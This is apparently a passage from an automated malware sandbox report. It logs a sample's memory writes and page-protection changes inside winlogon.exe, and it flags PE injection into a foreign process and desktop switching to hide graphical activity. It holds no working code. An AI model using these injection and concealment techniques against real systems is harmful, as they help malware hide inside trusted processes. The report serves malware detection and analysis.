Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE14000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE18000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE34000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE38000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE54000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE58000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE74000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE78000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE94000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE98000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D456000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D458000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D460000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D461000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D474000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D476000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D478000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D480000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D481000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D494000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D496000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D498000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4B8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4D8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F4000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D4F8000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D500000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D501000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D514000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D516000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D518000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D520000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D521000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D534000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D536000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D538000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D540000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D541000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D554000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D556000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D558000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D560000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D561000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D574000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D576000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D578000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D580000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D581000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D594000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D596000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory protected: C:\Windows\System32\winlogon.exe base: D598000 protect: page execute and read and writeJump to behavior
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Source: C:\Users\user\Desktop\glGb1KYfX6.exe Code function: 0_2_0040B6B3 OpenWindowStationA, SetProcessWindowStation, OpenDesktopA, SetThreadDesktop, CloseDesktop, CloseWindowStation
Injects a PE file into a foreign processes
Writes to foreign memory regions
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CAF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CB98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CBF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CC98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CCF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD21000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD34000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD36000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD38000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD40000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD41000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD54000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD56000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD58000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD60000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD61000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD74000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD76000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD78000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD80000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD81000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD94000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD96000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CD98000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDA1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDB8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDC1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE0000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE1000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF4000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF6000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF8000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE00000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE01000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE14000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE16000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE18000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE20000Jump to behavior
Source: C:\Users\user\Desktop\glGb1KYfX6.exeMemory written: C:\Windows\System32\winlogon.exe base: CE21000Jump to behavior
